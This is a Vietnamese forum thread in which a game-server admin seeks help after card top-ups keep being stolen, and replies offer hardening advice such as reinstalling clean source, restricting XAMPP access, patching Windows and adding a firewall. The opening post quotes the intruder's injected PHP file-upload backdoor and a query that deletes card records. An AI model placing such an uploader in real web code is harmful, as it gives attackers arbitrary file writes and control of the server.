PDA

View Full Version : [MU] Help bị hack NBB bản 5.12.0908 có trả phí



southrain1111
17-03-14, 01:07 PM
Hiện tại em bị hack thẻ liên tục, thủ phạm cứ tạo ra 1 số file lạ và thay đổi code để liếm thẻ
Không biết trong forum của đại ca nào khắc phục được không, em sẽ trả phí đàng hoàng

1 số ví dụ về hành tung của thủ phạm:

CODE bị chèn thêm:

<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
{
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>
if($files["name"] != ''){
$fullpath = $_REQUEST["path"].$files["name"];
if(move_uploaded_file($files['tmp_name'],$fullpath)){
echo "<h1><a href='$fullpath'>OK-Click here!</a></h1>";
}
}
exit('<form method=POST enctype="multipart/form-data" action=""><input type=text name=path><input type="file" name="files"><input type=submit value="Up"></form>');
}


$query = "delete from cardphone where stt='619' ";

...
Một số file lạ xuất hiện như:

vault.php
config_autonap1.php
view_mu.php
...

Khả năng có dính Shell, em biết trong diễn đàn có rất nhiều Pro nên chắc sẽ có người giúp được thôi. Em đảm bảo sẽ trả phí cao nếu như khắc phục được hoàn toàn ! Các bác giúp em với

thocon
17-03-14, 01:12 PM
Hiện tại em bị hack thẻ liên tục, thủ phạm cứ tạo ra 1 số file lạ và thay đổi code để liếm thẻ
Không biết trong forum của đại ca nào khắc phục được không, em sẽ trả phí đàng hoàng

1 số ví dụ về hành tung của thủ phạm:

CODE bị chèn thêm:




...
Một số file lạ xuất hiện như:

vault.php
config_autonap1.php
view_mu.php
...

Khả năng có dính Shell, em biết trong diễn đàn có rất nhiều Pro nên chắc sẽ có người giúp được thôi. Em đảm bảo sẽ trả phí cao nếu như khắc phục được hoàn toàn ! Các bác giúp em với
trả bao nhiêu nhỉ
nếu đã dùng NBB trả phí thì vấn đề nằm ở apache của bạn
liên hệ mình mình sẽ bảo mật lại cho đảm bảo
yahoo: mugiatoc
phone:0974.772.833

mrrainnt
17-03-14, 01:26 PM
Bản này cũ rồi mà bạn ? Sao không xài bản mới hơn nhỉ ?

southrain1111
17-03-14, 01:28 PM
Mình đảm bảo sẽ trả phí cao nếu tìm được nguyên nhân và khắc phục hoàn toàn đỡ lo về sau.
Mình chỉ dùng 1 bản WEB ko cần update

mrrainnt
17-03-14, 01:33 PM
<b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b>

Có gì khi nào rảnh mình team xem thử coi sao

thocon
17-03-14, 01:43 PM
nếu bản code NBB bạn hoàn toàn tin tưởng mình có thể khẳng định mình sẽ bảo mật được 100% nói không với mất thẻ cào !
câu nói này có thể quá lố lăng nhưng người ta vẫn nói cao nhân át có cao nhân trị
nhưng mình hoàn toàn có thể bảo mật với những gì bạn có ở thời điểm này
bạn cần xác định nguyên nhân
1 VPS
2 code NBB bạn download ()nguồn có đáng tin
...........

NetBanBe.Net
17-03-14, 01:47 PM
Dùng hàng ngoài thì phải chấp nhận nguy hiểm rồi

southrain1111
17-03-14, 01:49 PM
NetBanBe.Net có giúp được không, trả phí 1 năm mua bản lic híc !

NetBanBe.Net
17-03-14, 01:53 PM
NetBanBe.Net có giúp được không, trả phí 1 năm mua bản lic híc !
Trả phí không phải vấn đề, mà vấn đề ở chỗ bạn không tôn trọng người làm.
Còn cách FIX thì chỉ có cách duy nhất là xóa hết đi.
Làm sạch toàn bộ Web trên Server.
Sử dụng bản Web mới.
Hosting nếu sử dụng cũng phải thuê mới.
Nói chung thay toàn bộ Web.

thocon
17-03-14, 02:01 PM
Trả phí không phải vấn đề, mà vấn đề ở chỗ bạn không tôn trọng người làm.
Còn cách FIX thì chỉ có cách duy nhất là xóa hết đi.
Làm sạch toàn bộ Web trên Server.
Sử dụng bản Web mới.
Hosting nếu sử dụng cũng phải thuê mới.
Nói chung thay toàn bộ Web.
đúng vậy !
trả tiền cho NBB ok !
nhưng vấn đề ở đây anh Vinh cần hiểu là không phải do code của NBB mà là do bảo mật ở xammp
()mình đã nói chuyện và đã gần như hiểu cách thức

mrrainnt
17-03-14, 02:13 PM
Cái này dính Shell, coi như nó thay đổi code rồi up thêm mấy file cần thiết !

Thủ đoạn cực kỳ nham hiểm :)! check thẻ => xóa thẻ, member vẫn có $ và admin thì không hề hay biết nếu không để ý :)

The Gamer
17-03-14, 02:21 PM
Cậu úp toàn bọcacs file bị dính lên đây

cụ thể là cậu chạy hosting bên nào

hay chạy localhost

web này tải từ đâu về

hoainam8080
17-03-14, 02:22 PM
Nghe nói cái thủ đoạn này chỉ còn nước cài lại máy tính thì phải, một thử nghiệm nho nhỏ là xóa web đi up web mới vào.

thocon
17-03-14, 02:24 PM
Cái này dính Shell, coi như nó thay đổi code rồi up thêm mấy file cần thiết !

Thủ đoạn cực kỳ nham hiểm :)! check thẻ => xóa thẻ, member vẫn có $ và admin thì không hề hay biết nếu không để ý :)
chuẩn đấy
nhưng hãy đặt mình là admin bạn sẽ hiểu ức chế ra sao
vấn đề là cách khắc phục
không phải là do web NBB lậu hay bất kỳ bộ mã nguồn nào, mà vấn đề ở đây là khi mới mở sự lường trước căn bản không được nghĩ đến, hai là vốn không có quá nhiều,
những trường hợp như này NBB chắc sẽ không giải quyết, kể cả khi bạn dùng NBB có mua lic
đơn giản nó không phải lỗi của NBB mà là cách bảo mật của bạn

chicken1
17-03-14, 02:24 PM
Bạn nên cho forum cách xa trang tk ra.muhoanggia của mình bị thằng sonthuy.net/napthe nó hack mà cay là k làm dc gì nó .nó còn nói hieunova gì k biết

lequangvu
17-03-14, 03:07 PM
Trước mình cũng có bị và đổi luôn host, bởi cái host đấy cùi vãi, mình bảo mật kiểu gì cũng bị, đến sau bằng cách gọi cho bên nhà cung cấp host chặn ip của nó không cho kết nối với lại thêm .htaccess nữa là hết, bá đạo :D, bởi code web mình dùng bản mới nhất của NBB trên trang chủ luôn nên không có chuyện dính shell. rút ra là do host đểu, có khắc phục được nhưng vẫn phải thay host :P

mrrainnt
17-03-14, 03:22 PM
chuẩn đấy
nhưng hãy đặt mình là admin bạn sẽ hiểu ức chế ra sao
vấn đề là cách khắc phục
không phải là do web NBB lậu hay bất kỳ bộ mã nguồn nào, mà vấn đề ở đây là khi mới mở sự lường trước căn bản không được nghĩ đến, hai là vốn không có quá nhiều,
những trường hợp như này NBB chắc sẽ không giải quyết, kể cả khi bạn dùng NBB có mua lic
đơn giản nó không phải lỗi của NBB mà là cách bảo mật của bạn

Chứ bạn nghĩ những cái mình nói đâu ra ? Mình đã từng bị và khắc phục được thì mới nói :)!

Đơn giản vì chủ thớt download web trên mediafire nên dính thôi, xóa XAMPP cài lại download web sạch hết là :)!

Vì bây giờ có update mã nguồn mới cũng vậy, vì shell nằm trong XAMPP rồi

--- Chế độ gộp bài viết ---


Bạn nên cho forum cách xa trang tk ra.muhoanggia của mình bị thằng sonthuy.net/napthe nó hack mà cay là k làm dc gì nó .nó còn nói hieunova gì k biết

Cái này cũng là 1 cách, vì mã nguồn VBB có lỗ hỏng dẫn tới tụi nó chèn shell rồi chiếm quyền để thay đổi file :)!

Nên 1 HOST đặt Forum - 1 Host đặt Quản Lý, 2 cái tách riêng ra là OK

southrain1111
17-03-14, 03:35 PM
Híc cái này là phần Sever không liên quan gì đến Host ạ :(, Host thì tất nhiên mình để mỗi thứ ở 1 tài khoản, riêng trang id bao giờ cũng nằm riêng và không bị sao, bị là bị trên Sever :((

Cảm ơn các đại ca đã tư vấn

mrrainnt
17-03-14, 03:49 PM
Híc cái này là phần Sever không liên quan gì đến Host ạ :(, Host thì tất nhiên mình để mỗi thứ ở 1 tài khoản, riêng trang id bao giờ cũng nằm riêng và không bị sao, bị là bị trên Sever :((

Cảm ơn các đại ca đã tư vấn

Bây giờ bạn xóa hết XAMPP đi, download mã nguồn từ NBB :)!

Hoặc PM mình, mình còn giữ bản này download từ NBB !

vanbinh19991
17-03-14, 04:20 PM
chủ toppic pm y/h ; hotro.thuynguyen t giúp bảo mật miễn phí cho . đảm bảo k bị hack 100% yên tâm luôn

cuocdoisp
17-03-14, 05:31 PM
Cách làm rất đơn giản
1. cài xampp bảo mật , chỉ cho ip hosting kết nối đến . Ngoài ra cấm hết -> hạn chế 99% hack thẻ tại server , cho dù có shell cũng không sợ
2. Tại hosting : Nếu dính shell thì sẽ bị tình trạng mất thẻ và member không nhận được tiền . Khi bị tại hosting cách khắc phục đó là xóa toàn bộ và sử dụng source mới . Lưu ý đặt riêng tài khoan trên 1 hosting .không đặt cùng home,intro, forum . Ngoài ra còn cách khác đó là tự tìm xem file nào là shell . đây là một cách quá vất vả và không khả thi .

TB: pro nào cũng chỉ làm vậy thôi . Bạn có thể mất tiền để thuê hoặc tự làm . Đấy là tùy bạn

southrain1111
17-03-14, 07:05 PM
Cảm ơn anh cs anh có thể giúp em luôn cách chỉ cho 1,2 ip của host kết nối tới xampp được không, em sẽ hậu tạ :D nếu anh đồng ý thì em pm yahoo anh luôn

BoyGau
17-03-14, 07:17 PM
Cảm ơn anh cs anh có thể giúp em luôn cách chỉ cho 1,2 ip của host kết nối tới xampp được không, em sẽ hậu tạ :D nếu anh đồng ý thì em pm yahoo anh luôn

Tìm bài của Hrain đi bạn bảo mật xampp đó

chubelonton
17-03-14, 11:04 PM
Cách làm rất đơn giản
1. cài xampp bảo mật , chỉ cho ip hosting kết nối đến . Ngoài ra cấm hết -> hạn chế 99% hack thẻ tại server , cho dù có shell cũng không sợ
2. Tại hosting : Nếu dính shell thì sẽ bị tình trạng mất thẻ và member không nhận được tiền . Khi bị tại hosting cách khắc phục đó là xóa toàn bộ và sử dụng source mới . Lưu ý đặt riêng tài khoan trên 1 hosting .không đặt cùng home,intro, forum . Ngoài ra còn cách khác đó là tự tìm xem file nào là shell . đây là một cách quá vất vả và không khả thi .

TB: pro nào cũng chỉ làm vậy thôi . Bạn có thể mất tiền để thuê hoặc tự làm . Đấy là tùy bạn
mình vả bão đảm các bạn làm mu lâu năm đã làm cách này.và an toàn tuyệt đối,hiện tại host diễn đàn mình hết hạn mình lười đi thanh toán.chuyển về dùng chung với host để home luôn.không sao cả.nếu mems báo nạp thẻ mà không có tiền thì bảo đảm bị trộm !^^ thì mình nhờ bên hosting backup lại hoặc xóa hết tải home mới lên lại.rồi chuyển diễn đàn đi là xong.và mình củng có khả năng giúp bạn nếu bạn cần !^^

southrain1111
19-03-14, 11:09 AM
Host thì mình không sợ có điều bảo mất Xampp thì chưa thử, ai có bản Xampp bảo mật ko up lại giùm cái, bản Xampp trên diễn đàn link là file .exe sợ bỏ xừ

southrain1111
19-03-14, 11:28 AM
Cách làm rất đơn giản
1. cài xampp bảo mật , chỉ cho ip hosting kết nối đến . Ngoài ra cấm hết -> hạn chế 99% hack thẻ tại server , cho dù có shell cũng không sợ
2. Tại hosting : Nếu dính shell thì sẽ bị tình trạng mất thẻ và member không nhận được tiền . Khi bị tại hosting cách khắc phục đó là xóa toàn bộ và sử dụng source mới . Lưu ý đặt riêng tài khoan trên 1 hosting .không đặt cùng home,intro, forum . Ngoài ra còn cách khác đó là tự tìm xem file nào là shell . đây là một cách quá vất vả và không khả thi .

TB: pro nào cũng chỉ làm vậy thôi . Bạn có thể mất tiền để thuê hoặc tự làm . Đấy là tùy bạn

Xin lỗi cho em hỏi ngu 1 chút ạ, theo cách 1. Nếu như shell nằm trên Sever thì không sợ đúng không ạ :| giả sử Shell nằm trên Code Web trang quản lý thì khả năng liệu phần Web trên Sever có dính không? :( vì nó điều khiển Shell qua Host thì IP của Host chính là IP cho phép rồi liệu thủ phạm có điều khiển Shell trên Sever qua 1 thứ gì đấy nằm trên Host được không :(

NetBanBe.Net
19-03-14, 11:32 AM
Xin lỗi cho em hỏi ngu 1 chút ạ, theo cách 1. Nếu như shell nằm trên Sever thì không sợ đúng không ạ :| giả sử Shell nằm trên Code Web trang quản lý thì khả năng liệu phần Web trên Sever có dính không? :( vì nó điều khiển Shell qua Host thì IP của Host chính là IP cho phép rồi liệu thủ phạm có điều khiển Shell trên Sever qua 1 thứ gì đấy nằm trên Host được không :(
Cách nhận biết Shell trên Host hay trên Server:

Shell trên Host : Người chơi nạp thẻ không nhận được Gcoin. Hệ thống báo thẻ sai
Shell trên Server : Người chơi nạp thẻ nhận được Gcoin. Hệ thống không lưu lại thẻ người chơi đã nạp.

cuocdoisp
19-03-14, 11:40 AM
Xin lỗi cho em hỏi ngu 1 chút ạ, theo cách 1. Nếu như shell nằm trên Sever thì không sợ đúng không ạ :| giả sử Shell nằm trên Code Web trang quản lý thì khả năng liệu phần Web trên Sever có dính không? :( vì nó điều khiển Shell qua Host thì IP của Host chính là IP cho phép rồi liệu thủ phạm có điều khiển Shell trên Sever qua 1 thứ gì đấy nằm trên Host được không :(

Nweb chỉ đồng bộ từ Server-> hosting chứ ko có ngược lại . Nếu cài bảo mật Xampp thì việc có shell trên webserver cũng không sợ vì muốn sử dụng Shell việc đầu tiên là phải truy cập được vào webserver theo chuẩn <b><font color=red>[Chỉ có thành viên mới xem link được. <a href="register.php"> Nhấp đây để đăng ký thành viên......</a>]</font></b> Xampp bảo mật chỉ cho những ip được phép truy cập vào thôi -> không thể truy cập -> không thể sử dụng shell . Còn tất nhiên nếu bị hack pass remoter hay virus trên vps thì là chuyện khác .
Lưu ý : là việc hack thẻ có thể diễn ra cả trên hosting tức là thẻ nạp vào cái nó chuyển qua tài khoản người hack luôn . Nhưng kiểu hack này thì 85% là member sẽ ko nhận được tiền trong game
TB: nếu bạn cho phép ip của người hack truy cập vào đc thì chịu :))

southrain1111
21-04-14, 07:42 PM
Tình hình là em bảo mật xong vài ngày nó lại tạo được tk đăng nhập VPS :(, chặn hết ip rồi quả này hết cách đỡ rồi, nó đăng nhập được cả vào VPS nản quá, mới bị nó xóa Table MEMB_INFO :((

chicken1
21-04-14, 07:52 PM
100k sweb full lic
có cả lic nbb bạn tải bản mới nhất về rồi pm mình giúp

Rozoll
21-04-14, 08:05 PM
PM : Seo_Vps
- Free :D
- Dù ai đi ngược về xuôi nhớ ngày giỗ tổ ... ? (gợi ý câu trả lời: mung 10 thang 3)

The Gamer
21-04-14, 08:13 PM
100k sweb full lic
có cả lic nbb bạn tải bản mới nhất về rồi pm mình giúp

:d có full license bản 25.03 hả cậu :D

luutrunhac
21-04-14, 08:34 PM
Tình hình là em bảo mật xong vài ngày nó lại tạo được tk đăng nhập VPS :(, chặn hết ip rồi quả này hết cách đỡ rồi, nó đăng nhập được cả vào VPS nản quá, mới bị nó xóa Table MEMB_INFO :((

Cài thêm firewall nữa. Nếu bạn dùng XP và ko bật firewall không đến 5' vào vps của bạn bình thường dù bạn có đặt pass khó cỡ nào.
Theo như bạn mô tả thì mình dự đoán 99% là bạn đang dính lỗi ms08_067 trên win XP hoặc server 2k3.

woxiangnihh
22-04-14, 02:05 AM
Cái này đơn giản, chỉ 1 lần là bạn biết làm và không ai có thể hack được của bạn

Tuy nhiên phải đảm bảo web NBB phải chuẩn

cuocdoisp
22-04-14, 10:24 AM
bị đột nhập vps với hệ điều hành 2003 là chuyện khá bình thường vì microsoft đã thông báo lỗi bảo mật này rồi . cách khắc phục như sau
1. Update win lên bản mới nhất : để auto update nó sẽ tự lấy thông tin từ microsoft
2. Đổi port remoter của vps : đảm bảo không bị hack pass remoter do nó không biết port remoter
3. Cài xampp bảo mật và chỉ cho phép các ip từ hosting truy cập : đảm bảo không bị tạo user mới từ việc có shell trên webserver
4-5: không cài mysql và fezilla trên máy chủ : việc hack 2 cái này trên xamp khá nhiều người có thể dễ dàng làm được . Đặc biệt là cái fezilia ( thưởng chỉ mất 5s để hack và chiếm toàn bộ quyền sử dụng ổ HDD của bạn -> theo lời hacker nói và mình cũng từng tận mắt xem )
------------------------- không có gì là tuyệt đối , nhưng nó có thể đảm bảo bạn chống đc đến mức độ cao nhất có thể . ----------------------
TB: tuy ít dính nhưng vẫn có thể xảy ra : máy bị dính keylogger :)) . Kiểm tra xem có file nào chạy ẩn không bằng cách bật msconfig.cfg hoặc Task manager

Về hosting :
- bị tạo file thì 100% là có shell .Cách khắc phục
1. liên hệ nhà cung cấp hosting yêu cầu xóa toàn bộ và tạo mới lại hosting . Lên nweb tải bản khác tương ứng với Version bạn đang dùng . Đặc biệt không được dùng lại source đang có trên máy tính của bạn ( 90% source đó đã bị đính shell vào , việc tìm là gần như rất khó khăn nhất là lúc bạn đang rất bối rối )
2. Nếu làm cách 1 vẫn bị thì do thằng cung cấp hosting của bạn nó đã bị dính shell trên server của nó . Khắc phục bằng cách kiếm cái hosting mới